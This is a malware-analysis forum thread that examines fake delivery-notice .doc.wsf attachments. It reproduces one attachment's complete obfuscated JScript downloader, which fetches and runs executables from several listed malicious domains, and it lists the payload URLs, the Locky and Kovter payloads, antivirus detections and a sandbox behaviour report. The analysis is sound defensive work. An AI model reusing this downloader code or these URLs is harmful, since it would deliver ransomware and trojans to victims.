Antivirus scan for aa82459641ac99a94efafa8744a509a1747d23875de8a1e4ba4b3311991c0452 at 2017-01-14 01:46:56 UTC - VirusTotal

a2.exe : Win32/Kovter.C

10/57
Antivirus scan for e02df2c791e66ebbfdbed9d9cc53de8637777422b5c891b45304caf606936771 at 2017-01-14 01:48:20 UTC - VirusTotal​

 

[Svoll]

From https://malwaretips.com/threads/13-01-2016-22.67512/
Thanks to @Der.Reisende

Item-Delivery-Details-00000629997.doc.wsf

"var a = ""; a += 'var ad="1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj"'; a += '; var ld=0'; a += '; var c'; a += 's=Stri'; a += 'ng.fro'; a += 'mCharCode('; a += '92); var'; a += ' ll=["lacr'; a += 'ossetr'; a += 'avel.com",'; a += '"sergey'; a += 'tattoo'; a += '.ru","no'; a += 'bilisasse'; a += 'ssoria.co'; a += 'm.br","ru.'; a += 'ifo.su"'; a += ',"cecichu'; a += 'rrascoemdo'; a += 'micili'; a += 'o.com.'; a += 'br"]; var'; a += ' ws=WScr'; a += 'ipt.C'; a += 'reate'; a += 'Object("W'; a += 'Script'; a += '.Shell");'; a += ' var fn='; a += 'ws.Ex'; a += 'pandEnviro'; a += 'nmentStri'; a += 'ngs("%'; a += 'TEMP%'; a += '")+cs'; a += '+"a"; var'; a += ' xo=WScr'; a += 'ipt.Create'; a += 'Objec'; a += 't("Msx'; a += 'ml2.XMLHTT'; a += 'P"); var'; a += ' xa=WSc'; a += 'ript.Cre'; a += 'ateObject('; a += '"ADOD'; a += 'B.Stre'; a += 'am"); v'; a += 'ar fo=WScr'; a += 'ipt.Create'; a += 'Object("'; a += 'Scripti'; a += 'ng.FileS'; a += 'ystemObjec'; a += 't"); if '; a += '(!fo.Fi'; a += 'leExi'; a += 'sts(fn+".t'; a += 'xt")) '; a += '{ var fp'; a += '=fo.Crea'; a += 'teText'; a += 'File(fn'; a += '+".txt",tr'; a += 'ue); f'; a += 'p.Wri'; a += 'teLine('; a += '""); f'; a += 'p.Close('; a += '); for(va'; a += 'r n=1'; a += ';n<=2;'; a += 'n++) {'; a += ' for(va'; a += 'r i=ld;i'; a += '<ll.leng'; a += 'th;i++'; a += ') { va'; a += 'r dn=0;'; a += ' try { x'; a += 'o.open("'; a += 'GET","htt'; a += 'p://"+ll[i'; a += ']+"/counte'; a += 'r/?i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA&'; a += 'a="+ad+"&'; a += 'r="+i+n,'; a += ' false);'; a += ' xo.se'; a += 'nd();'; a += ' if(xo.st'; a += 'atus==200)'; a += ' { xa.'; a += 'open(); xa'; a += '.type='; a += '1; xa'; a += '.write('; a += 'xo.res'; a += 'ponse'; a += 'Body)'; a += '; if(x'; a += 'a.size>1'; a += '0000) { dn'; a += '=1; xa.s'; a += 'aveToFi'; a += 'le(fn+n'; a += '+".exe",2)'; a += '; try{'; a += 'ws.Run(fn+'; a += 'n+".exe",'; a += '1,0);'; a += '}catch(er'; a += '){}; }; '; a += 'xa.close('; a += '); };'; a += ' if(dn==1)'; a += '{ld=i'; a += ';break'; a += ';}; } c'; a += 'atch(er)'; a += '{}; }; }; '; a += '};'; _eval(a);"

=> at the end : eval(a)
=> builds a new string and runs it.

It is the same deobfuscated downloader that have been seen on previous post, so I will only show domains & URLs used:


Payloads :

a1.exe : Locky ransomware

a2.exe : Win32/Kovter.C
​

Thanks for the update! The method used on this malware reminds me of the movie INCEPTION. It went to another level or stage as it builds a new string and to hide itself.

Inception 2 : the movie (Malware vs DardiM) Malware conceals his true true hiding place while sending Penguin on a wild goose hunt. WIll Penguin be able to navigate thru the labyrinth of obfuscated codes to track down Malware, Coming December 2017 at a thread near you on MT!

 

[DardiM]

Thanks for the update! The method used on this malware reminds me of the movie INCEPTION. It went to another level or stage as it builds a new string and to hide itself.

Inception 2 : the movie (Malware vs DardiM) Malware conceals his true true hiding place while sending Penguin on a wild goose hunt. WIll Penguin be able to navigate thru the labyrinth of obfuscated codes to track down Malware, Coming December 2017 at a thread near you on MT!

LOoOL !!!

Maybe we are thinking I post analysis here, and in reality, it is not reality ...

 

[DardiM]

From https://malwaretips.com/threads/13-01-2016-22.67512/
Thanks to @Der.Reisende

Undelivered-Package-00780518.doc.wsf

- Exactly the same first downloader than Item-Delivery-Details-00000629997.doc.wsf posted yesterday

Domains :

var x = new Array(

"nobilisassessoria.com.br",
"sergeytattoo.ru",
"lacrossetravel.com",
"ru.ifo.su",
"cecichurrascoemdomicilio.com.br"​

);​

URLs built :

http ://domain/counter/?a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&m=5751177&i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU​

​

- Second downloader : PAYLOADS

Domains :​

var ll = [

"eternitydevelop.heyshop.eu",
"ru.ifo.su",
"www . vrlpromoters.com",
"cecichurrascoemdomicilio.com.br",
"nobilisassessoria.com.br"​

];​

a1.exe :

http ://domain1/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=01

http :/domain2/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=11

http ://domain3/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=21

http ://domain4/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=31

http ://domain5/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=41
​

a2.exe :

http ://domain1/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-
hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=02

http ://domain2/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=12

http ://domain3/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=22

http ://domain4/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=32

http ://domain5/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=42​

Payloads :

a1.exe : BehavesLike.Win32.AdwareDoma.gc

=> locky ransomware with osiris extension

Example : 777D4678--3D4D--492B--88DECF1E--D60D40AFD100.osiris​

8/57
Antivirus scan for eec91a9252379e060ff3afb82052e0eafc0b30a3a4c1eff0d9a6ea774beb6e35 at 2017-01-14 18:07:27 UTC - VirusTotal

a2.exe : a variant of Win32/GenKryptik.REJ

=> Kovter Trojan

​

12/57
Antivirus scan for 72bee8bde06ad84fcc68874e10e5a7eb8a86b1b5f56157f6c723d964a203be95 at 2017-01-14 18:10:01 UTC - VirusTotal

a2.exe : Analysis with VoodoShield => Cuckoo Sandbox

Executed a process and injected code into it, probably while unpacking
Injection: a2.exe(1588) -> regsvr32.exe(1200)
Detects VirtualBox through the presence of a library
Detects Sandboxie through the presence of a library
Detects SunBelt Sandbox through the presence of a library
Deletes its original binary from disk
A process attempted to delay the analysis task by a long amount of time.
Process: regsvr32.exe tried to sleep 200083 seconds, actually delayed analysis time by 0 seconds
Process: a2.exe tried to sleep 100044 seconds, actually delayed analysis time by 0 seconds
Creates or sets a registry key to a long series of bytes, possibly to store a binary or malware config
regkeyval: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\asnb\navionvfna
regkeyval: HKEY_CURRENT_USER\Software\asnb\lwkoqrnylw
regkeyval: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\asnb\lwkoqrnylw
regkeyval: HKEY_CURRENT_USER\Software\HQa6Wm1X\vHNXi09hms
regkeyval: HKEY_CURRENT_USER\Software\HQa6Wm1X\9VljwUBAbW
regkeyval: HKEY_CURRENT_USER\Software\asnb\navionvfna
Creates a registry key or value with NUL characters to avoid detection with regedit
keyval: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x00utghemc\xe4\xb9\xa5
Installs itself for autorun at Windows startup
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x00utghemc\xe4\xb9\xa5
data: "C:\Users\Administrator\AppData\Local\d40a\7fe4.bat"
Attempts to identify installed analysis tools by registry key
key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Wireshark.exe
key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Wireshark.exe
key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Wireshark
key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Wireshark
key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Fiddler.exe
key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Fiddler.exe
key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Fiddler2.exe
key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Fiddler2.exe
key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fiddler2
key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fiddler2
key: HKEY_CURRENT_USER\Software\Microsoft\Fiddler2
key: HKEY_LOCAL_MACHINE\Software\Microsoft\Fiddler2
key: HKEY_CURRENT_USER\SOFTWARE\Classes\SOFTWARE\IEInspectorSoft\HTTPAnalyzerAddon
key: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SOFTWARE\IEInspectorSoft\HTTPAnalyzerAddon
key: HKEY_CURRENT_USER\SOFTWARE\Classes\IEHTTPAnalyzer.HTTPAnalyzerAddOn
key: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IEHTTPAnalyzer.HTTPAnalyzerAddOn
key: HKEY_CURRENT_USER\Software\Classes\Charles.AMF.Document
key: HKEY_LOCAL_MACHINE\Software\Classes\Charles.AMF.Document
Attempts to identify installed AV products by installation directory
file: C:\ProgramData\Trend Micro
File has been identified by at least ten Antiviruses on VirusTotal as malicious
MicroWorld-eScan: Gen:Variant.Symmi.69386
McAfee: Artemis!B751A0FEE0D5
Malwarebytes: Trojan.Kovter
CrowdStrike: malicious_confidence_63% (W)
Arcabit: Trojan.Symmi.D10F0A
Symantec: Heur.AdvML.B
ESET-NOD32: a variant of Win32/GenKryptik.REJ
Avast: Win32:Malware-gen
BitDefender: Gen:Variant.Symmi.69386
Ad-Aware: Gen:Variant.Symmi.69386
Emsisoft: Gen:Variant.Symmi.69386 (B)
F-Secure: Gen:Variant.Symmi.69386
Invincea: virus.win32.jadtre.k
McAfee-GW-Edition: BehavesLike.Win32.MultiPlug.fc
GData: Gen:Variant.Symmi.69386
Tencent: Win32.Trojan.Inject.Auto
Checks the version of Bios, possibly for anti-virtualization
Checks the presence of disk drives in the registry, possibly for anti-virtualization
Detects VirtualBox through the presence of a file
file: C:\Users\Administrator\AppData\Local\Temp\VBoxHook.dll
file: C:\Windows\VBoxHook.dll
file: C:\Windows\System32\VBoxHook.dll
file: C:\Windows\System32\wbem\VBoxHook.dll
file: C:\Windows\system\VBoxHook.dll
file: C:\Windows\SysWOW64\VBoxHook.dll
file: C:\Windows\System32\WindowsPowerShell\v1.0\VBoxHook.dll
file: C:\Windows\System32\drivers\VBoxMouse.sys
Detects VirtualBox through the presence of a registry key
Detects VMware through the presence of a file
Detects VMware through the presence of a registry key
Detects Virtual PC through the presence of a file
Attempts to modify browser security settings
Generates some ICMP traffic
Collects information to fingerprint the system
Anomalous binary characteristics

See the below link for test results with AVs, on Malware Hub part :

https://malwaretips.com/threads/locky-kovter.67546
Thanks to @silversurfer
and all the AV Tester Members.​

 

[Svoll]

a1.exe :

http ://domain1/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=01

http :/domain2/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=11

http ://domain3/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=21

http ://domain4/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=31

http ://domain5/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=41
a2.exe :

http ://domain1/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-
hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=02

http ://domain2/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=12

http ://domain3/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=22

http ://domain4/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=32

http ://domain5/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=42

This is what INCEPTION calls a dream within a dream within a dream!!!!

Are you awake Penguin or still dreaming up this stuff

Thanks for this information!

Domains :

var x = new Array(
"nobilisassessoria.com.br",
"sergeytattoo.ru",
"lacrossetravel.com",
"ru.ifo.su",
"cecichurrascoemdomicilio.com.br"
);

URLs built :

http ://domains/counter/?a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&m=5751177&i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU
- Second downloader : PAYLOADS

Domains :

var ll = [
"eternitydevelop.heyshop.eu",
"ru.ifo.su",
"www.vrlpromoters.com",
"cecichurrascoemdomicilio.com.br",
"nobilisassessoria.com.br"
];

 

[DardiM]

This is what INCEPTION calls a dream within a dream within a dream!!!!

Are you awake Penguin or still dreaming up this stuff

Thanks for this information!

Domains :

var x = new Array(
"nobilisassessoria.com.br",
"sergeytattoo.ru",
"lacrossetravel.com",
"ru.ifo.su",
"cecichurrascoemdomicilio.com.br"
);

URLs built :

http ://domains/counter/?a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&m=5751177&i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU
- Second downloader : PAYLOADS

Domains :

var ll = [
"eternitydevelop.heyshop.eu",
"ru.ifo.su",
"www.vrlpromoters.com",
"cecichurrascoemdomicilio.com.br",
"nobilisassessoria.com.br"
];

Lol ! You make me doubt now ! Are we reals ? is MT real ?